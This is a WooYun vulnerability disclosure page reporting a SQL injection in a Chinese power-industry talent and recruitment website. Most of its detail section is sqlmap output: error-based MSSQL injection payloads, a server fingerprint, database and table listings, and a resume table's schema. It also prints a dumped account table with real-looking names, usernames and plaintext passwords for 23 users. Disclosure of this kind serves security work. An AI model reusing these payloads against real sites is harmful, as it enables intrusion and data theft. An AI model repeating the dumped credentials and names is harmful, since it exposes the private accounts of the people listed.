当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0156834

漏洞标题:电力高级人才网存在SQL注入/泄露上万的简历信息

相关厂商:电力高级人才网

漏洞作者: 路人甲

提交时间:2015-12-01 01:32

修复时间:2016-01-18 11:40

公开时间:2016-01-18 11:40

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-12-01: 细节已通知厂商并且等待厂商处理中
2015-12-04: 厂商已经确认,细节仅向厂商公开
2015-12-14: 细节向核心白帽子及相关领域专家公开
2015-12-24: 细节向普通白帽子公开
2016-01-03: 细节向实习白帽子公开
2016-01-18: 细节向公众公开

简要描述:

电力高级人才网存在SQL注入/泄露上万的简历信息,影响多个数据库。

详细说明:

注入点:
http://**.**.**.**/show.aspx?ID=2015101609225000015

sqlmap identified the following injection point(s) with a total of 309 HTTP(s) requests:
---
Parameter: ID (GET)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: ID=2015101609225000015' AND 6200=CONVERT(INT,(SELECT CHAR(113)+CHAR(120)+CHAR(113)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (6200=6200) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(106)+CHAR(98)+CHAR(113))) AND 'NoyN'='NoyN
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.6, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
sqlmap identified the following injection point(s) with a total of 309 HTTP(s) requests:
---
Parameter: ID (GET)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: ID=2015101609225000015' AND 6079=CONVERT(INT,(SELECT CHAR(113)+CHAR(118)+CHAR(106)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (6079=6079) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(113)+CHAR(106)+CHAR(113))) AND 'xoTQ'='xoTQ
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.6, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
current database: 'dlwebdb'
current user is DBA: False
available databases [14]:
[*] cptdb
[*] cptdb_yj
[*] cptdb_yj_dl
[*] dddb
[*] dldb_yj
[*] dlwebdb
[*] FinanceSystemDB
[*] fyh_cptdb
[*] fyh_xsdydb
[*] hbdb
[*] master
[*] model
[*] msdb
[*] tempdb


数据库的数据量。Database: dlwebdb
+------------------------+---------+
| Table | Entries |
+------------------------+---------+
| dbo.gj_jobkeyword | 1421129 |
| dbo.gj_bbsinfo | 171712 |
| dbo.gj_compjob | 128830 |
| dbo.gj_jobhistory | 91820 |
| dbo.gj_jobaddno | 67771 |
| dbo.gj_userlist | 64378 |
| dbo.gj_jobeducation | 59881 |
| dbo.gj_jobinfo | 57425 |
| dbo.gj_posaddno | 53193 |
| dbo.gj_positioninfo | 52456 |
| dbo.gj_jobkeyinfo | 49454 |
| dbo.gj_jobtxtlist | 30864 |
| dbo.gj_complookjob | 27646 |
| dbo.myTableInfo | 26888 |
| dbo.Table1 | 21659 |
| dbo.gj_report | 19390 |
| dbo.gj_webinfo | 13787 |
| dbo.myTableList | 12634 |
| dbo.gj_compaddno | 9419 |
| dbo.gj_agreement | 8977 |
| dbo.gj_agreeaddno | 8569 |
| dbo.gj_companyinfo | 8205 |
| dbo.gj_checkinfo | 4920 |
| dbo.myepjoblist | 4090 |
| dbo.myTablejobhistory | 2451 |
| dbo.gj_bbsuserlist | 2390 |
| dbo.myTablejobedu | 1870 |
| dbo.myTableJobinfo | 1845 |
| dbo.gj_bbstotallist | 1431 |
| dbo.gj_jobkeylist | 1241 |
| dbo.gj_companyinfo_bak | 1090 |
| dbo.gj_bbsrecinfo | 1014 |
| dbo.bjxJobList2 | 999 |
| dbo.gj_areainfo | 824 |
| dbo.myTableLook | 531 |
| dbo.gj_compjob_bak | 433 |
| dbo.gj_specialinfo | 315 |
| dbo.gj_jobinfo_bak | 287 |
| dbo.gj_posinfo | 187 |
| dbo.gj_myjoblist | 183 |
| dbo.gj_compproperty | 97 |
| dbo.gj_bbscoluminfo | 31 |
| dbo.gj_nbwebinfo | 27 |
| dbo.gj_userinfo | 23 |
| dbo.gj_userconnect | 22 |
| dbo.gj_webcol | 12 |
| dbo.gj_educationinfo | 10 |
| dbo.gj_headhunter | 5 |
+------------------------+---------+


用户信息:

Table: gj_userinfo
[23 entries]
+---------------------+---------------+-------------+----------------+----------+-----------+-----------+-----------+--------------+------------------------------------+
| userid | load_ip | userpwd | username | usercode | isenabled | usercname | userclass | load_pretime | load_curtime |
+---------------------+---------------+-------------+----------------+----------+-----------+-----------+-----------+--------------+------------------------------------+
| 201209251123010001 | **.**.**.** | 111 | yjh@**.**.**.** | 00001 | Y | 杨建宏 | 9 | NULL | 07 20 2015 \\?a0\\?33:40PM |
| 201209251123010002 | **.**.**.** | 87508617 | yangjie | 00002 | Y | 杨结 | 9 | NULL | 11 27 2015 \\?a0\\?33:20PM |
| 201209251123010003 | NULL | zmjy7631986 | zhangming | 00003 | N | 张明 | 1 | NULL | 03 19 2013 \\?a0\\?32:42PM |
| 201209251123010004- | **.**.**.** | 349694645 | wangyegang | 00004 | Y | 王叶纲 | 9 | NULL | 11 26 2015 \\?a0\\?35:27PM |
| 201209251123010005 | **.**.**.** | 15575889742 | zhouwei | 00005 | Y | 周维 | 1 | NULL | 07 22 2015 \\?a0\\?38:28AM |
| 201209251123010006 | NULL | 87508617 | huxueli | 00006 | N | 胡雪莉 | 1 | NULL | 10 18 2013 10:18AM |
| 201209251123010008 | NULL | 719009 | xuliequan | 00008 | N | 许烈全 | 1 | NULL | 03 \\?a0\\?31 2013 \\?a0\\?38:52AM |
| 201209251123010009 | **.**.**.** | 87508617 | huangxianghong | 00009 | Y | 黄祥红 | 1 | NULL | 08 17 2015 11:15AM |
| 201209251123010010 | NULL | 888888 | chenyerui | 00010 | N | 陈业瑞 | 1 | NULL | 05 \\?a0\\?39 2013 10:35AM |
| 201209251123010011 | NULL | hly182 | heliying | 00011 | N | 何丽英 | 1 | NULL | 09 30 2013 \\?a0\\?31:53PM |
| 201209251123010012 | NULL | 888888 | zhubinbin | 00012 | N | 朱彬彬 | 1 | NULL | 07 17 2013 \\?a0\\?35:51PM |
| 201209251123010013 | NULL | 265399 | yangsong | 00013 | N | 杨松 | 1 | NULL | 08 23 2013 \\?a0\\?34:29PM |
| 201209251123010014 | NULL | 888888 | gaolin | 00014 | N | 高林 | 1 | NULL | 07 18 2013 \\?a0\\?39:20AM |
| 201209251123010015 | **.**.**.** | gm123123 | guomin | 00015 | Y | 郭敏 | 9 | NULL | 11 27 2015 10:42PM |
| 201209251123010016 | NULL | 666666 | yuanyabo | 00016 | N | 袁亚波 | 1 | NULL | 02 19 2014 \\?a0\\?34:45PM |
| 201209251123010017 | NULL | 888888 | luyanqun | 00017 | N | 陆燕群 | 1 | NULL | 10 16 2013 \\?a0\\?32:29PM |
| 201209251123010018 | NULL | 11221122 | changbin | 00018 | Y | 常斌 | 1 | NULL | 08 12 2014 \\?a0\\?39:43AM |
| 201209251123010019 | NULL | *881016* | yuanfeng | 00019 | N | 袁峰 | 1 | NULL | 06 24 2014 \\?a0\\?33:15PM |
| 201209251123010020 | NULL | 11221122 | fangang | 00020 | Y | 樊刚 | 1 | NULL | 08 13 2014 \\?a0\\?31:49PM |
| 201209251123010021 | **.**.**.** | 888888 | huangkexiang | 00021 | Y | 黄克祥 | 1 | NULL | 05 19 2015 \\?a0\\?39:23PM |
| 201209251123010022 | <blank> | 888888 | zhoulingyu | 00022 | Y | 周玲玉 | 1 | NULL | 08 25 2015 \\?a0\\?38:29AM |
| 201209251123010023 | **.**.**.** | 888888 | panhuan | 00023 | Y | 潘欢 | 1 | NULL | 08 17 2015 \\?a0\\?38:23AM |
| 202209251123010007 | NULL | 876256 | tianwei | 00007 | Y | 删除库 | 1 | NULL | 01 \\?a0\\?34 2013 \\?a0\\?35:55PM |
+---------------------+---------------+-------------+----------------+----------+-----------+-----------+-----------+--------------+------------------------------------


简历信息:

Table: mytableinfo
[44 columns]
+---------------+----------+
| Column | Type |
+---------------+----------+
| addr | varchar |
| age | int |
| birthadr | varchar |
| birthday | datetime |
| class1 | varchar |
| class2 | varchar |
| cname | varchar |
| country | varchar |
| curadr | varchar |
| education | text |
| email | varchar |
| getadr | varchar |
| getadr1 | varchar |
| getadr2 | varchar |
| getcname | varchar |
| getdate | datetime |
| getjob1 | varchar |
| getjob2 | varchar |
| getjob3 | varchar |
| getmoney | varchar |
| government | varchar |
| height | varchar |
| hightedu | varchar |
| host | varchar |
| inputdate | datetime |
| isget | char |
| jobid | varchar |
| jobno | varchar |
| jobtype | varchar |
| language1 | varchar |
| language2 | varchar |
| marry | varchar |
| modidate | datetime |
| nationality | varchar |
| phone | varchar |
| projectremark | text |
| remark | text |
| sex | varchar |
| startwork | varchar |
| tel | varchar |
| weight | varchar |
| workhistory | text |
| workpos | varchar |
| workyear | decimal |
+---------------+----------+


漏洞证明:

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-12-04 11:37

厂商回复:

CNVD确认并复现所述情况,已由CNVD通过网站管理方公开联系渠道向其邮件通报,由其后续提供解决方案。

最新状态:

暂无


漏洞评价:

评价